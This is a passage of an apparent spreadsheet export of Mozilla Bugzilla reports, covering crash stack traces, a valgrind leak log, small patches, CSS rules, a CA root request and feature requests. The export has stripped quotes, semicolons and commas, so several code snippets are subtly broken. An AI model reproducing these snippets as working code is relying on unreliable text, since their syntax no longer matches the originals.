js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 841]
js_Interpret [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 2804]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 857]
nsXPCWrappedJSClass::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp line 1202]
nsXPCWrappedJS::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp line 430]
PrepareAndDispatch
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp
line 117]
SharedStub
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp
line 139]
nsTreeWalker::TestNode
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 598]
nsTreeWalker::ChildOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 535]
nsTreeWalker::FirstChildOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 319]
nsTreeWalker::NextInDocumentOrderOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 405]
nsTreeWalker::NextNode
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 269]
XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp
line 106]
XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp line 2018]
XPC_WN_CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp
line 1284]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 841]
js_Interpret [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 2804]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 857]
nsXPCWrappedJSClass::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp line 1202]
nsXPCWrappedJS::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp line 430]
PrepareAndDispatch
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp
line 117]
SharedStub
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp
line 139]
nsTreeWalker::TestNode
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 598]
nsTreeWalker::ChildOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 535]
nsTreeWalker::FirstChildOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 319]
nsTreeWalker::NextInDocumentOrderOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 405]
nsTreeWalker::NextNode
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 269]
XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp
line 106]
XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp line 2018]
XPC_WN_CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp
line 1284]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 841]
js_Interpret [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 2804]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c line 857]
nsXPCWrappedJSClass::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp line 1202]
nsXPCWrappedJS::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp line 430]
PrepareAndDispatch
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp
line 117]
SharedStub
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp
line 139]
nsTreeWalker::TestNode
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 598]
nsTreeWalker::ChildOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 535]
nsTreeWalker::FirstChildOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 319]
nsTreeWalker::NextInDocumentOrderOf
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 405]
nsTreeWalker::NextNode
[c:/builds/seamonkey/mozilla/content/base/src/nsTreeWalker.cpp line 269]
XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp
line 106]</t>
  </si>
  <si>
    <t>FIREFOX-387597</t>
  </si>
  <si>
    <t>remove unneeded rule for #noPreviewAvailable from setDesktopBackground.css</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: trunk
The following code in the winstripe version of setDesktopBackground.css is not used and should be removed.
#noPreviewAvailable {
  background-color: white !important
  font-size: 12px !important
}
See also https://bugzilla.mozilla.org/show_bug.cgi?id=362239#c19
Reproducible: Always</t>
  </si>
  <si>
    <t>mcdavis941.bugs</t>
  </si>
  <si>
    <t>CORE-296892</t>
  </si>
  <si>
    <t>OOM crash [@ nsSocketTransport::Init]</t>
  </si>
  <si>
    <t>this is an audit the Init methods need to complain if !mLock and you can't 
assume strdup will succeed (strcmp will crash when you're wrong).</t>
  </si>
  <si>
    <t>CORE-69993</t>
  </si>
  <si>
    <t>cannot access xpcom property editorSelection in editorShell interface</t>
  </si>
  <si>
    <t>trying to get editorSelection (from nsIEditorShell.idl ) leads to messages:
 Call to xpconnect wrapped JSObject produced this error:  *
[Exception... Can not find interface information for parameter arg 0 [nsIEditor
Shell.editorSelection]  nsresult: 0x80570006 (NS_ERROR_XPC_CANT_GET_PARAM_IFAC
E_INFO)  location: JS frame :: chrome://editor/content/ComposerCommands.js ::
anonymous :: line 913  data: no]
The same (a try to get the editorSelection ) saw for composer editor mail news
Curently the bug prevents smiley to be inserted</t>
  </si>
  <si>
    <t>anatoliya</t>
  </si>
  <si>
    <t>CORE-292114</t>
  </si>
  <si>
    <t>InstantiateFullPagePlugin should take nsIURI* not nsString&amp;</t>
  </si>
  <si>
    <t>InstantiateFullPagePlugin has exactly one caller. That caller would have an
easier time passing an nsIURI than an nsString&amp;. Additionally the first thing
that this function does with the string is to construct an nsIURI* from it. This
also means that the originCharset is lost.
So it should just take an nsIURI* (like the other two functions taking an URI
on this interface)</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-482898</t>
  </si>
  <si>
    <t>Allow an optional array of engines for wipeRemote wipeServer resetClient etc.</t>
  </si>
  <si>
    <t>From bug 482792 comment 2. wipeRemote in addition to all the other {wipereset}{ServerClient} should take an optional list of engine names to just perform the action on those engines instead of everything.</t>
  </si>
  <si>
    <t>CORE-417562</t>
  </si>
  <si>
    <t>protect against Obj-C exceptions in modules top-level directory</t>
  </si>
  <si>
    <t>For implementing the strategy we decided on in bug 163260 we are filing a bug for each top-level directory that needs work.
mozilla/modules</t>
  </si>
  <si>
    <t>NSS-407168</t>
  </si>
  <si>
    <t>Add GeoTrust EV Root CA to Root Store</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1)
Build Identifier: 
Please accept this GeoTrust EV root certificate for inclusion in Firefox:
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
This CA is currently used to sign certificates for SSL-enabled servers and may
in the future be used to sign certificates for digitally-signed executable code
objects.
The CPS is at http://www.geotrust.com/resources/repository/legal.aspdf
Attestation of our conformance to the stated verification requirements can be
found here: https://cert.webtrust.org/ViewSeal?id=650
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-368729</t>
  </si>
  <si>
    <t>Use hyphens for property names in property change events</t>
  </si>
  <si>
    <t>The property names here need to use hyphens to be consistent with Gnome:
http://lxr.mozilla.org/seamonkey/source/accessible/src/atk/nsDocAccessibleWrap.cpp#61</t>
  </si>
  <si>
    <t>CORE-500621</t>
  </si>
  <si>
    <t>TM: Leak [@ RegExpNativeCompiler::compile]</t>
  </si>
  <si>
    <t>$ cat w1-reduced.js 
(function(){.replace(/n/).replace(/r/)})()
$ valgrind --auto-run-dsymutil=yes --leak-check=full ./js-dbg-tm-intelmac -j w1-reduced.js 
/snip
==61035== 1656 (80 direct 1576 indirect) bytes in 1 blocks are definitely lost in loss record 95 of 108
==61035==    at 0x2790F7: calloc (vg_replace_malloc.c:414)
==61035==    by 0x15396A: avmplus::GCObject::operator new(unsigned long avmplus::GC*) (avmplus.h:167)
==61035==    by 0xF7F7A: RegExpNativeCompiler::compile(JSContext*) (jsregexp.cpp:2404)
==61035==    by 0xF443F: CompileRegExpToNative(JSContext* JSRegExp* nanojit::Fragment*) (jsregexp.cpp:2484)
==61035==    by 0xF4653: GetNativeRegExp(JSContext* JSRegExp*) (jsregexp.cpp:2519)
==61035==    by 0xF46C3: MatchRegExp(REGlobalData* REMatchState*) (jsregexp.cpp:3930)
==61035==    by 0xF4AC5: js_ExecuteRegExp (jsregexp.cpp:4099)
==61035==    by 0x10C461: match_or_replace(JSContext* int (*)(JSContext* int GlobData*) void (*)(JSContext* GlobData*) GlobData* unsigned int long*) (jsstr.cpp:1400)
==61035==    by 0x10CD60: js_StringReplaceHelper (jsstr.cpp:1809)
==61035==    by 0x10CFBD: str_replace(JSContext* unsigned int long*) (jsstr.cpp:1773)
==61035==    by 0x865B4: js_Interpret (jsinterp.cpp:5181)
==61035==    by 0x9A94E: js_Execute (jsinterp.cpp:1633)
==61035== 
==61035== LEAK SUMMARY:
==61035==    definitely lost: 80 bytes in 1 blocks.
==61035==    indirectly lost: 1576 bytes in 14 blocks.
==61035==      possibly lost: 44 bytes in 1 blocks.
==61035==    still reachable: 181152 bytes in 1310 blocks.
==61035==         suppressed: 3220 bytes in 80 blocks.
==61035== Reachable blocks (those to which a pointer was found) are not shown.
==61035== To see them rerun with: --leak-check=full --show-reachable=yes
http://mxr.mozilla.org/mozilla-central/source/js/src/jsregexp.cpp#2404</t>
  </si>
  <si>
    <t>CORE-113112</t>
  </si>
  <si>
    <t>Page with iframe.src changed doesn't work correctly in Mozilla</t>
  </si>
  <si>
    <t>http://airnet.netdemonz.com/ Moz: 11/16 Win32
This page isn't working correctly in Mozilla although it works correctly in IE. 
1) When the iframe.src is changed by clicking on 802.11b Draft the iframe
becomes empty. 
2) When the CNET article is clicked on it still stays empty.
3) When you hit refresh the link to the draft appears.
4) When you hit enter on the URL bar the page is reset. (Which is correct).
Expected:
1) link becomes available for the Draft.
2) CNET  page reappears
3) Same as 4
See behavior in IE6.
I will create a testcase if this bug is validated.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-330252</t>
  </si>
  <si>
    <t>Expose a .getInstanceDoc() on instance element</t>
  </si>
  <si>
    <t>If you via script run through a document find an instance element and want to inspect its instance document you have to note its ID and then go to the model element to ask for the instance document via the ID. It seems a bit awkward to me.
How about creating a scriptable function that returns the document directly on the instance itself?
interface nsIXFormsInstanceElement : nsISupports {
  nsIDOMDocument getInstanceDocument()
}
And yes somebody (I...) should make an effort to push some of these extensions to the WG...</t>
  </si>
  <si>
    <t>WEBSITES-384388</t>
  </si>
  <si>
    <t>Request: add David Boswell's blog feed to planet</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en-us) AppleWebKit/419 (KHTML like Gecko) Safari/419.3
Build Identifier: 
I just set up a new blog (http://davidwboswell.wordpress.com/) to discuss issues relating to the mozilla foundation and mozdev and I'd like to get a feed from the blog added to p.m.o.  The relevant categories are:
mozilla
http://davidwboswell.wordpress.com/feed/?cat=24
mozdev
http://davidwboswell.wordpress.com/feed/?cat=702268
I haven't posted anything in either of these categories yet but will be happy to put tests posts up if that would be helpful.  I'll start doing some actual posting in a week or so.
Thanks for the help with this.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>BUGZILLA-57817</t>
  </si>
  <si>
    <t>Internet Explorer gets the refresh thing wrong.</t>
  </si>
  <si>
    <t>The patch at the URL will add some more info to the headers to make the refresh 
thing work in IE as well. It looks like this has been fixed in almost all places 
but these two.
This is against todays bugzilla.</t>
  </si>
  <si>
    <t>CORE-312941</t>
  </si>
  <si>
    <t>Caret move events not reported for XUL textboxes</t>
  </si>
  <si>
    <t>Steps:
1. Run MSAA Inspect
2. Enable viewing of caret move events
3. Move caret in address bar of Firefox
What happens:
Caret location change events are not reported but should be as they are for HTML.
This would also help fix bug 244119 for Tablet PC support.</t>
  </si>
  <si>
    <t>SEAMONKEY-219948</t>
  </si>
  <si>
    <t>Menu iconbar and other elements are not visible overlapping or badly positioned. Red error message at the bottom.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.5) Gecko/20030916
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.5) Gecko/20030916
The resize corner of the window is somewhere at the bottom left inside the
window instead of the bottom right corner but it works. The red text message
seems to be Courier font 14 pt. It has 2 lines and says:
label=
---------------^
I have a quite fresh installation of xp prof. and i did not import or do
anything else with the mail program (not possible in this state). Switching to
classic theme did not help.
Reproducible: Always
Steps to Reproduce:
1. Enable Quickstart Icon
2. Switch to Modern Theme and install german language pack.
3. Choose Mail &amp; Newsgroups in the menu or click the letter Symbol at the
bottom of the browser
themes see above</t>
  </si>
  <si>
    <t>danfang</t>
  </si>
  <si>
    <t>FIREFOX-404069</t>
  </si>
  <si>
    <t>tabbrowser tabs lack focus outline</t>
  </si>
  <si>
    <t>When you focus a tab e.g. using your mouse there used to be a dotted border around the tab's title. It's gone since Gnomestripe has been forked.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-83957</t>
  </si>
  <si>
    <t>moremagic.com - Popup-menus do not work</t>
  </si>
  <si>
    <t>Pop-up menus using div and javascript do not work here as they should and works 
in NS and IE.
So before i could trust your browser this should be working with no problem.</t>
  </si>
  <si>
    <t>enthrone</t>
  </si>
  <si>
    <t>SEAMONKEY-280456</t>
  </si>
  <si>
    <t>crash at start or exit [@nsGenericElement::GetOwnerDoc ]</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Win98 en-US rv:1.8b) Gecko/20050130
BuildID 2005012805 was wfm 2005012906 was showing the regression.
15 talkbacks from different people:
http://talkback-public.mozilla.org/talkback/fastfind.jsp?search=1&amp;searchby=stacksig&amp;match=contains&amp;searchfor=+nsGenericElement%3A%3AGetOwnerDoc&amp;vendor=All&amp;product=All&amp;platform=All&amp;buildid=&amp;sdate=&amp;stime=&amp;edate=&amp;etime=&amp;sortby=bbid
mine: 
Suite crash at start: TB3385943E at exit: TB3385561E TB3374255H (identical)
Firefox at start may be another bug: TB3388116  nsXTFService::CreateElement 
Maybe related:
Bug 280341 crash at startup [@ nsCOMArray_base::~nsCOMArray_base]
has three identical talkbacks but different from these here. They tell the
regression was first seen 2005012822.
http://talkback-public.mozilla.org/talkback/fastfind.jsp?search=2&amp;type=iid&amp;id=TB3385943E
nsGenericElement::GetOwnerDoc 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/base/src/nsGenericElement.h
line 379]
nsCSSFrameConstructor::ProcessChildren 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsCSSFrameConstructor.cpp
line 11918]
nsCSSFrameConstructor::ConstructDocElementFrame 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsCSSFrameConstructor.cpp
line 4209]
nsCSSFrameConstructor::ContentInserted 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsCSSFrameConstructor.cpp
line 9174]
PresShell::InitialReflow 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsPresShell.cpp
line 2727]
nsContentSink::StartLayout 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/base/src/nsContentSink.cpp
line 955]
HTMLContentSink::StartLayout 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/html/document/src/nsHTMLContentSink.cpp
line 3643]
CNavDTD::HandleDefaultStartToken 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/CNavDTD.cpp
line 1284]
CNavDTD::HandleStartToken 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/CNavDTD.cpp
line 1643]
CNavDTD::HandleToken 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/CNavDTD.cpp
line 904]
CNavDTD::BuildModel 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/CNavDTD.cpp
line 461]
nsParser::BuildModel 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/parser/htmlparser/src/nsParser.cpp
line 2047]
crash at exit:
http://talkback-public.mozilla.org/talkback/fastfind.jsp?search=2&amp;type=iid&amp;id=TB3385561E
nsGenericElement::GetOwnerDoc 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/base/src/nsGenericElement.h
line 379]
DocumentViewerImpl::Close 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsDocumentViewer.cpp
line 1119]
nsDocShell::Destroy 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/docshell/base/nsDocShell.cpp
line 3336]
nsXULWindow::Destroy 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/appshell/src/nsXULWindow.cpp
line 489]
nsWebShellWindow::Destroy 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/appshell/src/nsWebShellWindow.cpp
line 1583]
nsWebShellWindow::Close 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/appshell/src/nsWebShellWindow.cpp
line 330]
nsAppStartup::Quit 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/components/startup/src/nsAppStartup.cpp
line 359]
nsAppStartup::Observe 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/components/startup/src/nsAppStartup.cpp
line 943]
nsObserverService::NotifyObservers 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpcom/ds/nsObserverService.cpp
line 235]
nsXULWindow::Destroy 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/appshell/src/nsXULWindow.cpp
line 530]
nsWebShellWindow::Destroy 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/appshell/src/nsWebShellWindow.cpp
line 1583]
nsWebShellWindow::Close 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/appshell/src/nsWebShellWindow.cpp
line 330]
nsWindow::DispatchEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 1103]
nsWindow::DispatchStandardEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 1143]
nsWindow::ProcessMessage 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 3866]
nsWindow::WindowProc 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 1389]
KERNEL32.DLL + 0x363b (0xbff7363b)
KERNEL32.DLL + 0x242e7 (0xbff942e7)</t>
  </si>
  <si>
    <t>THUNDERBIRD-454768</t>
  </si>
  <si>
    <t>ignore thread action k in grouped by sort mode does not mark the target subject to be ignored and behaves badly</t>
  </si>
  <si>
    <t>ignore thread action k in grouped by sort mode does not mark the target subject to be ignored and behaves badly. Badly for example includes marking the entire group as read.
1. pick newsgroup with many unread messages and set sort column to descending date
2. set grouped by sort mode (G or view|sort by|grouped)
3. pick a group with more than one unread message
4. select any message in the group
5. type 'k'
result:
all messages in group are marked read</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-203457</t>
  </si>
  <si>
    <t>[german help] translate help-index1.rdf</t>
  </si>
  <si>
    <t>help-index1.rdf ist bisher unÃ¼bersetzt aus Michaels Auswertung:
*) help-index1.rdf                        auf 1.2    (+1636 Zeilen)</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-405579</t>
  </si>
  <si>
    <t>please publish these pages
http://viewvc.svn.mozilla.org/vc?view=rev&amp;revision=8293
Thanks</t>
  </si>
  <si>
    <t>CALENDAR-142862</t>
  </si>
  <si>
    <t>Clicking on item in left hand pane should jump to next occurence of event</t>
  </si>
  <si>
    <t>When you click on an item on the left hand side it should jump to the next
occurence of that event not the first instance of that event.</t>
  </si>
  <si>
    <t>CORE-197568</t>
  </si>
  <si>
    <t>Dialog box with multiline textbox closes when user hits Enter in textbox</t>
  </si>
  <si>
    <t>Given an XUL dialog box like this:
&lt;dialog xmlns=http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
        buttons=acceptcancel&gt;
the user cannot use the Enter or Return keys in the textbox.  This is because
the event handlers at the end of the binding file call _hitEnter() and the
_hitEnter() function doesn't bother to check for an  element.
The fix should be easy:
(1) Pass the event object from the handlers to the _hitEnter() method.
(2) Add an evt argument to the _hitEnter() function to receive the event object.
(3) Check for ((evt.target.tagName != textarea)&amp;&amp;(evt.target.namespaceURI !=
http://www.w3.org/1999/xhtml)) before firing this.acceptDialog().</t>
  </si>
  <si>
    <t>NSS-479601</t>
  </si>
  <si>
    <t>Wrong type (UTF8 String) for email addresses in subject by CERT_AsciiToName</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 de rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
Build Identifier: 
When CERT_AsciiToName is called with a subject containing an email address like E=test@test.test the email address will be typed as UTF8 String.
According to RFC 3280 section 4.1.2.6 the type should be IA5String instead:
The attribute value for EmailAddress is of type IA5String
   to permit inclusion of the character '@' which is not part of the
   PrintableString character set.
I think this sentence is still valid and especially it was not changed by RFC 4630. Additionally OpenSSL (tested with 0.9.8h) and Microsoft Outlook 2007 don't recognize the email address if typed as UTF8 String instead of IA5String.
In earlier versions of NSS email addresses were typed correctly the bug was introduced with version 1.26 of mozilla/security/nss/lib/certdb/alg1485.c 
Reproducible: Didn't try
Steps to Reproduce:
I haven't tried to reproduce the problem with the NSS tools but I see the problem every time I programmatically create a certificate with CERT_AsciiToName(E=test@test.test) as the subject.
Calling
openssl -in test.cer -email
shows that openssl can't find any email address in the certificate (assuming no Subject Alternative Names are set).
Actual Results:  
No email address found by openssl
Expected Results:  
the address test@test.test should have been found
I will attach a .diff file for the latest hg version () that fixes the problem</t>
  </si>
  <si>
    <t>ch-bugsmozilla</t>
  </si>
  <si>
    <t>CORE-24122</t>
  </si>
  <si>
    <t>[MLK] Fix for leaking nsIInterfaceInfoManager</t>
  </si>
  <si>
    <t>This fixes a 27k leak.
Index: mozilla/xpcom/proxy/src/nsProxyEventClass.cpp
===================================================================
RCS file: /cvsroot/mozilla/xpcom/proxy/src/nsProxyEventClass.cppv
retrieving revision 1.20
diff -r1.20 nsProxyEventClass.cpp
199c199
&lt;     nsIInterfaceInfoManager *iim = XPTI_GetInterfaceInfoManager()
---
&gt;     nsCOMPtr iim =
getter_AddRefs(XPTI_GetInterfaceInfoManager())</t>
  </si>
  <si>
    <t>CORE-87277</t>
  </si>
  <si>
    <t>Tables don't collapse outer vertical margins [MARGIN-C]</t>
  </si>
  <si>
    <t>See: http://www.hixie.ch/tests/adhoc/css/box/table/006.xml
Tables don't collapse vertical margins. It works fine if you take the test and
replace table with block in the style block.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-351928</t>
  </si>
  <si>
    <t>RSS feed handlers for Russian Firefox</t>
  </si>
  <si>
    <t>The Russian l10n team would like to change set of pre-defined RSS feed readers
for Firefox 2. We'd like to add 2 most popular RSS feed readers in Russia: Yandex and Kanban.
We'd like to have this order for RSS feed readers (as Google Reader is not translated
into Russian right now):
- Yandex
- Kanban
- Bloglines
- My Yahoo
- Google Reader</t>
  </si>
  <si>
    <t>TESTOPIA-372521</t>
  </si>
  <si>
    <t>Error message popup in Reports of testopia when selecting product in Find Test Run.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1)
Build Identifier: Bugzilla version 2.22.1
Select Reports under testopia and click on Find Test Run and select a product. An error message pops up.
Reproducible: Always
Steps to Reproduce:
1.Select Reports under Testopia.
2.Select Find TestRuns.
3.select a product.
4.error message pops up.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-419771</t>
  </si>
  <si>
    <t>update ship locales to reflect the set ready for fx3  beta 4</t>
  </si>
  <si>
    <t>still working on sorting out the final details but it looks something like we might be picking up
diff -r1.5 shipped-locales
&gt; el
&gt; es-AR
&gt; sq
and possible remove he from the list used for beta 3.
patch coming up maybe tomorrow after the some more checking has been finished.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-387579</t>
  </si>
  <si>
    <t>crash while doing nothing... [@ nsMsgCompose::OnSendNotPerformed]</t>
  </si>
  <si>
    <t>Talkback:
http://talkback-public.mozilla.org/search/start.jsp?search=2&amp;type=iid&amp;id=TB33910695X
There I was minding my own business and working with other apps while sm trunk build 2007070201 was in the background and it crashes on me.</t>
  </si>
  <si>
    <t>ivo</t>
  </si>
  <si>
    <t>eyalroz</t>
  </si>
  <si>
    <t>MOZILLA.ORG-208528</t>
  </si>
  <si>
    <t>I need access to stage.mozilla.org</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U OSF1 alpha en-US rv:1.4) Gecko/20030604
Build Identifier: Mozilla/5.0 (X11 U OSF1 alpha en-US rv:1.4) Gecko/20030604
I have been contributing mozilla for two years now. Since I have moved out of
the Netscape building I need a fresh approval to ftp the builds to
stage.mozilla.org.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>shanmus</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-312562</t>
  </si>
  <si>
    <t>Investigate changing MDC wiki namespaces</t>
  </si>
  <si>
    <t>So Devmo isn't Devmo anymore now being known officially as MDC or
Mozilla Developer Center.  With the official name change comes the requirement
to change all instances of Devmo to MDC or Mozilla Developer Center.
In most cases this is simply a matter of editing content but with the wikis
it's a bit more complicated in that all the wiki namespaces have Devmo in them.
Could you please investigate the requirements and impact of changing the wiki
namespaces all to MDC?  I know we tried to change the namespaces before and it
caused all sorts of problems so before we try to do this again I'd like to
know that we've done a full investigation into what's required and how to avoid
the problems we encountered previously.
Thanks!</t>
  </si>
  <si>
    <t>FIREFOX-207372</t>
  </si>
  <si>
    <t>Element Properties -&gt; Image Properties should include file type</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
The Image Properties Window does not tell what type of image it is.  This can be
a problem when checking the images on bugzilla.
For example:
Go to http://bugzilla.mozilla.org/attachment.cgi?id=124232&amp;action=view
Right click on the image and select properties.
Using the properties window there is no valid way to determine what type of
image it is (aka gif png bmp etc...)  You will notice the location field has
the value http://bugzilla.mozilla.org/attachment.cgi?id=124232&amp;action=view 
Because of this you cannot determine the type from the URL of the image.
Thus for cases like this either an Image Type: or a Type: or a File Type
field would be useful to indicate what type of image it is.
----------------------
Here's one suggested layout of where to place the new field:
Location:
Width:
Height:
Size of File:
File Type:
Alternatate text:
---------------------
A suggested formatting of the File Type value could be as follows (note it is
similar to the Size of File field).
EXTENSION (Description)
GIF (Graphics Interlaced Format)
PNG (Portable Network Graphics)
BMP (Bitmap)
JPGJPEG (Joint Photographic ? Group?)
Hope I got them right :)
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>THUNDERBIRD-463523</t>
  </si>
  <si>
    <t>Exptoolbar needs an addrbook.png icon in pinstripe as it is in qute</t>
  </si>
  <si>
    <t>Created attachment 346779
new icon and jar.mn patch
This isn't strictly needed for Tb but not having it breaks exptoolbar on the mac and it seems a generally useful icon to be able to build on.  The icon itself that's included in this patch is the one from qute.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-346038</t>
  </si>
  <si>
    <t>Long URLs with ~ (tilde) escaped load incorrectly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.5) Gecko/20060715 SeaMonkey/1.0.3
